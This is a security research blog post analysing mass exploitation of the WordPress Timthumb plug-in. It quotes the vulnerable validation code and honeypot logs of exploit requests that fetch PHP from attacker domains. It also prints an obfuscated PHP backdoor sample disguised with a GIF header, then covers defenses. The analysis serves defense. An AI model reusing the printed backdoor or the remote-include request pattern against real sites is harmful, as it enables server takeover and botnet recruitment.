SpiderLabs Research Team has been tracking an increase in WordPress Timthumb plug-in scanning. How wide spread are the attacks? We just added the following entry to the Web Hacking Incident Database (WHID) -

WHID 2011-262: Hackers 'Timthumb' Their Noses At Vulnerability To Compromise 1.2 Million Sites

WordPress Timthumb Vulnerabilities

WordPress plug-ins have had a long history of security issues and the latest one that is being targeted by attackers is Timthumb which is an image resizing utility. OSVDB shows 19 different vulnerabilities in the timthumb.php script:

Timthumb Vulnerability

The Timthumb vulnerability lies in a client's ability to load content from a remote website using the "src=" parameter and to have the web server write that remote content to a web accessible directory which the client can then access and execute.

Timthumb's default configuration allows clients to load images from a predefined set of remote websites for resizing and serving:

// external domains that are allowed to be displayed on your website
$allowedSites = array (
        'flickr.com',
        'picasa.com',
        'blogger.com',
        'wordpress.com',
        'img.youtube.com',
        'upload.wikimedia.org',
        'photobucket.com',
);

Weak Domain Validation

Timthumb's validation of these domains was too weak:

                      // check allowed sites (if required)
                        if (ALLOW_EXTERNAL) {

                                $isAllowedSite = true;

                        } else {

                                $isAllowedSite = false;
                                foreach ($allowedSites as $site) {
if (strpos (strtolower ($url_info['host'] . '/'), $site) !== false) {
                                                $isAllowedSite = true;
                                        }
                                }

                        }

This section of code only checked that the allowed domain names were present but did not contain any bounds checking. This allowed attackers to create sub-domains that passed the checks. For example, here is a listing of bogus domains used in attacks we are seeing:

blogger.com.arestoscosmeticos.com.brblogger.com.bekesairport.hublogger.com.crimecyber.tkblogger.com.dollhousedelights.comblogger.com.fiestams1.comblogger.com.freeclicktrack.comblogger.com.jejeli.comblogger.com.midislandrental.comblogger.com.missionb4nk.co.ccblogger.com.relativoaonada.co.ccblogger.com.socialmediatrafficconsulting.comblogger.com.steam-evolution.frblogger.com.symbiontschism.comblogger.com.tep-alimentar.comimg.youtube.com.dollhousedelights.compicasa.com.crimecyber.tkpicasa.com.filesjump.compicasa.com.sienbity.compicasa.com.streetpaintingacademy.compicasa.com.thehungarianvizsla.orgpicasa.com.xpl.bepicasa.computergoogles.co.ccwordpress.com.gobvc.com

The Timthumb code has since been updated with stronger validation checks to ensure that there are no sub-domains used. Here is a code diff of the updated validation checks:

Timthumb Scanning

SpiderLabs Research Team has monitored large amounts of scanning for various Timthumb theme locations for WordPress. Here are some recent example probes taken from Apache honeypot logs:

72.167.247.190 - - [15/Nov/2011:17:03:49 +0900] "GET //wp-content/themes/multidesign//timthumb.php?src=http://img.youtube.com.dollhousedelights.com/.mods/index.php HTTP/1.1" 404 25072.167.247.190 - - [15/Nov/2011:17:03:50 +0900] "GET //wp-content/themes/multidesign//timthumb.php?src=http://img.youtube.com.dollhousedelights.com/.mods/sh.php HTTP/1.1" 404 25072.167.247.190 - - [15/Nov/2011:17:03:50 +0900] "GET //wp-content/themes/multidesign//timthumb.php?src=http://img.youtube.com.dollhousedelights.com/.mods/index.php HTTP/1.1" 404 25074.208.243.114 - - [15/Nov/2011:18:51:43 +0900] "GET /error_log//wp-content/themes/echoes/timthumb.php?src=http://picasa.com.sienbity.com/sample.php HTTP/1.1" 404 25474.208.243.114 - - [15/Nov/2011:18:51:44 +0900] "GET //wp-content/themes/echoes/timthumb.php?src=http://picasa.com.sienbity.com/sample.php HTTP/1.1" 404 244212.20.215.11 - - [15/Nov/2011:18:52:06 +0900] "GET /wp-content/themes/echoes/timthumb.php?src=http://blogger.com.freeclicktrack.com/bery.php HTTP/1.1" 404 243212.20.215.11 - - [15/Nov/2011:18:53:58 +0900] "GET /error_log/wp-content/themes/echoes/timthumb.php?src=http://blogger.com.freeclicktrack.com/bery.php HTTP/1.1" 404 253212.20.215.11 - - [15/Nov/2011:18:53:59 +0900] "GET /wp-content/themes/echoes/timthumb.php?src=http://blogger.com.freeclicktrack.com/bery.php HTTP/1.1" 404 24387.229.7.214 - - [15/Nov/2011:21:01:00 +0900] "GET /error_log//wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 26087.229.7.214 - - [15/Nov/2011:21:01:01 +0900] "GET //wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 25087.229.7.214 - - [15/Nov/2011:21:01:06 +0900] "GET /error_log//wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 26087.229.7.214 - - [15/Nov/2011:21:01:08 +0900] "GET //wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 25087.229.7.214 - - [15/Nov/2011:21:14:24 +0900] "GET //wp-content%2Fthemes%2Ftwentyeleven%2F','',%20'00d7440ee862e3d6328819b426082b518d63b83bff2382eac8c5',%200)//wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 44287.229.7.214 - - [15/Nov/2011:21:14:26 +0900] "GET //wp-content/themes/twentyeleven/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 25087.229.7.214 - - [15/Nov/2011:22:28:37 +0900] "GET /error_log/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 26487.229.7.214 - - [15/Nov/2011:22:28:39 +0900] "GET /wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 25487.229.7.214 - - [15/Nov/2011:22:30:14 +0900] "GET /wp-content%2Fthemes%2Fpbv_multi%2Fscripts%2F%22','',%20'00cde21c9ec2dd04d5110475ca5c39de0aef39f89b392513618e',%200)/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 46287.229.7.214 - - [15/Nov/2011:22:30:15 +0900] "GET /wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 25487.229.7.214 - - [15/Nov/2011:22:31:08 +0900] "GET /error_log/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 26487.229.7.214 - - [15/Nov/2011:22:31:09 +0900] "GET /wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 254

Over the past 3 days, we have identified the following statistics from our honeypots:

• 16838 Timthumb attack requests
• 158 unique source IP addresses sending attack requests

Injected Code Analysis

Here is an example of some malware code that is attempting to be uploaded to the timthumb script:

GIF89a????????!?????,???????D?;?<?php@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe5FJSfgE='))); die; }elseif (isset($osc)) { eval(gzinflate(base64_decode('pZHNasMwEITvhb6DYgyWIZS2lF5CwA9SEI48ilUcyWhlmhDy7l3J+ekhkENPEjM73w5SqXfdetMSPj9UB+07yNKTrlfPTyUI28mmAexlyWdSoXsvbhYrZnI6Wu9EnjKoj5wNILEWVcW+NUIusBvjYbaTb428xBT2liLJCnvoKrtNuubhZQLlMjPw21sniy9XXI0TVxoI94DUYxjUDXtmNDd9LvSAcqCI3bmY3yiKbYgyhZrZukIufB7aIirtXYRjRJ5lEa5TekDr5IOVY0sU+zDdXXox/722saQ46qeg+dNNQox+hJsfvghF/ffVioLDP70dIBeNgTccqWtxFNl/4bAJaDtWl2+v7x/1SpxSWT14SvS8mpWAOAWXQ0n5BQ=='))); }else { eval(gzinflate(base64_decode('pVNdi9swEHw/uP+wEQbFkCZpy0G5xKGhJEdpoAX3nkIwii3XAtsSllwnd+S/V7LsOL409KF+8cfOjGdnV07Ic0VzBR5IVTAhUyITKodO8OO7/3OLmzLeuTNwwpilVCPPRfOOd7pSvqmUTeX+joYJBzzfL+b7YoHHIhFBmZOMDt0xNp/mk/0Cd7iYFxmQUDGeewhBRlXCIw8JLhUCmofqKKiHsjJVTJBCTQz+XUQUQWBUPUQqBCyq75e6ih4UKSixqLZpqY6p5lQsUsnjw6cHcZgllP1K1OOH6VQctMLYabDa7aQVsb104iwXpQJrzWBaL3U+CCR70S/vpwh+k7TUjzmtTMWEga51LDcI9Y+UZltZWe4zpmxrQSnSs9YXC7tlxzqwkpduPk7R4qbv8n98a3OcRP/0/Wxhev5mhLUai89r13Sv1+71/g705SQkj+oVi7mg+dDu4ghwhd2ZhRi6RbUk+xWGcVUwRdvqCNqZuuB5HqyXG3/lwivU3SC9qjbTdt+flk/LjVlTM3U0g1MnTlNJbxP952/+yofBYHDJhjhMuTy7ad2femK4E1tfebDbZ3yc+qHZ6LvQdO1zyMVRI9ZfNyt/i+2x3GKVicDMC+9GzeF1ewnY6bTn+rqRfhRvY+iza+9/J5/+AA=='))); }?>

By analyzing this code, we can see some common techniques used by attackers.

Spoofing Image Mime-Types

By pre-padding their code with fake GIF image header data (highlighted data above), they can trick the following mime-type checks in Timthumb:

/** * determine the file mime type * * @param  $file * @return  */function mime_type ($file) {        $file_infos = getimagesize ($file);                // no mime type        if (empty ($file_infos['mime'])) {                display_error ('no mime type specified in image');        }        $mime_type = $file_infos['mime'];        // use mime_type to determine mime type    if (!preg_match ("/jpg|jpeg|gif|png/i", $mime_type)) {                display_error ('Invalid src mime type: ' . $mime_type);    }        $mime_type = strtolower ($mime_type);        $mime_type = str_replace ('image/', '', $mime_type);        if ($mime_type == 'jpeg') {                $mime_type = 'jpg';        }    return $mime_type;}

Code Obfuscation

They are obfuscating their actual code by combining multiple php functions. In this case, the payload is first base64 encoded and then it is compressed with gzip. In order to decode it correctly, you must apply the correct decoding/decompression in the correct order. SpiderLabs Research has seem many samples using different combinations of base64 encoding, gzip compression and str_rot13.

After decoding the injected code, we can then analyze the payloads to see what the true intentions are of the attacker.

Botnet Recruitment

What are the goals of these attacks? They are varied, however the vast majority of attacks call up PHP backdoor/trojan code that allow the attacker to take control of the web server. While there are many additional purposes for use of the compromised host, all of the backdoor code allows for using the web server as part of a botnet and for conducting DoS attacks. Here are some of the trojan backdoor samples we have gathered.

Fx29SheLL

Backdoor Interface

Google Search Results (131,000 compromised hosts)

b374k m1n1

Backdoor Interface

Google Search Results (112,000 compromised hosts)

WordPress Timthumb Defense

If you are running WordPress applications, it is highly recommended that you follow these steps.

Beware of Outdated Themes

The Timthumb.php script comes included in a large number of WordPress Themes including:

• Supermassive
• eGallery
• TheStyle
• ElegantEstates
• Modest
• Envisioned
• Boldnews
• Fordreporter
• Twentyeleven

Even though the Timthumb.php code itself has been updated to mitigate these vulnerabilities, many of these 3rd party Themes still have older versions bundled with them. You should verify your Timthumb version to ensure you have the latest code.

Run the WPScan Tool

There is an open source WordPress vulnerability scanner called WPScan that can quickly check your settings and alert you to outdated plugins. The most recent version also included a new runtime flag which will specifically look for Timthumb issues.

Install ModSecurity and the OWASP Core Rule Set

If ModSecurity is installed and using the OWASP Core Rule Set, it can detect both the inital infection attempts and also any access to a backdoor/trojan web page.

SpiderLabs Commercial Rules - WordPress Timthumb Virtual Patches

The newely released commercial ModSecurity Rules from Trustwave SpiderLabs includes virtual patches specifically for known WordPress Timthumb vulnerabilities:

(2075636) ModSecurity Rules from Trustwave SpiderLabs: LISL Last-Image Slider Plugin for WordPress wp-content/plugins/lisl-last-image-slider/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution(2075637) ModSecurity Rules from Trustwave SpiderLabs: Rent-A-Car Plugin for WordPress wp-content/plugins/rent-a-car/libs/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution(2075638) ModSecurity Rules from Trustwave SpiderLabs: Auto Attachments Plugin for WordPress wp-content/plugins/auto-attachments/thumb.php src Parameter File Upload Arbitrary PHP Code Execution(2075672) ModSecurity Rules from Trustwave SpiderLabs: A. Gallery Plugin for WordPress wp-content/plugins/a-gallery/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution(2075781) ModSecurity Rules from Trustwave SpiderLabs: Simple Slide Show Plugin for WordPress wp-content/plugins/simple-slide-show/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution(2076737) ModSecurity Rules from Trustwave SpiderLabs: Popular Posts Plugin for WordPress wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php src Parameter File Upload Arbitrary PHP Code Execution

If you are interested in purchasing the commercial rules feed subscription, head on over to the shopping cart.